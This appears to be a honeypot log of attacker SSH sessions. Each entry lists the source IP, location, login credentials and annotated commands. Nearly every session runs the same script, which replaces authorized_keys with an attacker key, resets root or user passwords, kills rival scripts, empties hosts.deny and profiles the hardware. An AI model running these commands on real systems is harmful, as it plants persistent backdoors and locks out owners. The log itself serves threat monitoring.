$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:XG4jBWuFP66V"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 bibimbap_root_13 (115.178.75.243) β€” Gangseo-gu, South Korea Β· 1 session Β· 19 cmds
2026-05-14 02:17 EDT Β· as root/noi
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:QtJKn11g8TdO"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_29 (115.190.37.201) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-14 02:16 EDT Β· as root/Qwer@1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:e8A4C7pLhm1E"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_102 (103.48.192.48) β€” Dich Vong, Vietnam Β· 2 sessions Β· 38 cmds
2026-05-14 01:29 EDT Β· as root/108108108, root/Pass@12345
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:YafvEYB2QGj2"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:0FqEN9W3WJvy"|chpasswd|bash
🎭 specter_root_24 (165.154.5.173) β€” Hong Kong, Hong Kong Β· 3 sessions Β· 58 cmds
2026-05-12 02:10 EDT Β· as arkserver/arkserver, root/108108108, root/Pass@12345
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:uWZiIGp8jUfb"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:E6on5ykwxQvq"|chpasswd|bash
$ echo -e "arkserver\n7bK5akPqEWbo\n7bK5akPqEWbo"|passwd|bash
$ Enter new UNIX password:
$ echo "arkserver\n7bK5akPqEWbo\n7bK5akPqEWbo\n"|passwd
🎭 scone_root_8 (37.143.61.60) β€” City of London, United Kingdom Β· 1 session Β· 19 cmds
2026-05-14 01:36 EDT Β· as root/Pass@12345
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:oEcl9OnbDFcw"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 bear_root_5 (109.195.108.173) β€” Yekaterinburg, Russia Β· 2 sessions Β· 40 cmds
2026-05-13 23:44 EDT Β· as egmzkeaq/cguD9AaqJ6jN, sdadmin/51nGleD
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "cguD9AaqJ6jN\nXZ8NnlB1bjEh\nXZ8NnlB1bjEh"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "cguD9AaqJ6jN\nXZ8NnlB1bjEh\nXZ8NnlB1bjEh\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "51nGleD\nYOGJMSmDMlV3\nYOGJMSmDMlV3"|passwd|bash
$ echo "51nGleD\nYOGJMSmDMlV3\nYOGJMSmDMlV3\n"|passwd
🎭 ramen_root_8 (49.212.161.73) β€” Osaka, Japan Β· 2 sessions Β· 38 cmds
2026-05-13 21:57 EDT Β· as root/123.321, root/paresh
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:F2Q62s8y1Nuc"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:j1ZHzqje0qeU"|chpasswd|bash
🎭 wraith_root_27 (83.111.76.195) β€” Dubai, United Arab Emirates Β· 4 sessions Β· 77 cmds
2026-05-03 23:28 EDT Β· as admin/1q2w#E$R, root/123.321, root/Fh123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:Wmv6pKSut02R"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:UL28m5JYYaUp"|chpasswd|bash
$ echo -e "1q2w#E$R\nCuZ8whnQ63NX\nCuZ8whnQ63NX"|passwd|bash
$ Enter new UNIX password:
$ echo "1q2w#E$R\nCuZ8whnQ63NX\nCuZ8whnQ63NX\n"|passwd
$ echo "root:ZoCWl8iSBQ2L"|chpasswd|bash
🎭 shadow_root_91 (180.93.172.213) β€” QuαΊ­n Bα»‘n, Vietnam Β· 1 session Β· 19 cmds
2026-05-13 21:48 EDT Β· as root/paresh
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:uOMtIGuUQ1F9"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_sol_3 (4.221.162.168) β€” Johannesburg, South Africa Β· 2 sessions Β· 40 cmds
2026-05-13 18:36 EDT Β· as egmzkeaq/cguD9AaqJ6jN, zhangsong/zhangsong
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "zhangsong\nMCgCy3ljDN5t\nMCgCy3ljDN5t"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "zhangsong\nMCgCy3ljDN5t\nMCgCy3ljDN5t\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "cguD9AaqJ6jN\nMWI0iTzWJZqj\nMWI0iTzWJZqj"|passwd|bash
$ echo "cguD9AaqJ6jN\nMWI0iTzWJZqj\nMWI0iTzWJZqj\n"|passwd
🎭 shadow_sol_3 (101.36.124.219) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-05-13 17:41 EDT Β· as zhangsong/zhangsong
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "zhangsong\nK5AOdxZ028VS\nK5AOdxZ028VS"|passwd|bash
$ Enter new UNIX password:
$ echo "zhangsong\nK5AOdxZ028VS\nK5AOdxZ028VS\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_92 (103.86.198.162) β€” Gazipur, Bangladesh Β· 1 session Β· 20 cmds
2026-05-13 17:26 EDT Β· as aryan/aryan
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "aryan\nSrf8p7suaDHk\nSrf8p7suaDHk"|passwd|bash
$ Enter new UNIX password:
$ echo "aryan\nSrf8p7suaDHk\nSrf8p7suaDHk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_96 (185.158.23.150) β€” Karbala, Iraq Β· 2 sessions Β· 39 cmds
2026-05-13 15:27 EDT Β· as root/manoj, www/123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
